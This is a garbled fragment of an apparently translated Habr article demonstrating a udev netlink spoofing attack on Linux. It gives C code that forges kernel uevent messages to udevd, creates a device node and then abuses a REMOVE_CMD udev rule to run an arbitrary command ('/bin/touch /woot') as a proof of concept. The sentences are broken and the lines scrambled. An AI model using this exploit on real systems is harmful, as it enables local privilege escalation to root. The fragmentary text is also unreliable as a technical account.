int netlink_socket = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
man 7 netlink
and fill in the destination address for the package:struct sockaddr_nl dest;<br/>memset(&dest, 0, sizeof(dest));<br/>dest.nl_family = AF_NETLINK;<br/>dest.nl_pid = pidof_udev;<br/>
strace -p `pidof udevd`
, strace -p `pidof udevd`
something into USB and get an approximate package format:#define REQ(act, dev) \<br/> act "@/class/mem/" dev "\0" \<br/> "UDEV_LOG=3\0" \<br/> "ACTION=" act "\0" \<br/> "DEVPATH=/class/mem/" dev "\0" \<br/> "SUBSYSTEM=mem\0" \<br/> "MAJOR=1\0" \<br/> "MINOR=1\0" \<br/> "SEQNUM=3747\0" \<br/> "UDEVD_EVENT=1\0" \<br/> "DEVNAME=/dev/" dev "\0"<br/>char req1[] = REQ("add", "ufo");
sendto(netlink_socket, req1, sizeof(req1)-1, 0, (struct sockaddr*)&dest, sizeof(dest));
And we get the answer “Connection refused”.dest.nl_pid = pidof_udev - 1 ;
After that, send()
did not return any errors, and moreover, a strange /dev/ufo
file appeared in /dev
, which was just created through a hole in udev. But to create a device is not very interesting, it is better to execute your code./dev/mem
and /dev/kmem
is interesting, but for a proof-of-concept, you can also cut the road. Run grep -r RUN /etc/udev/rules.d/
and find the strange written rule:ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"
/dev/ufo
:char req2[] = REQ("remove", "ufo") "REMOVE_CMD=/bin/touch /woot\0";<br/>sendto(netlink_socket, req2, sizeof(req2)-1, 0, (struct sockaddr*)&dest, sizeof(dest));
Run ... UFO flew in and left the file /woot
!Source: https://habr.com/ru/post/57687/
All Articles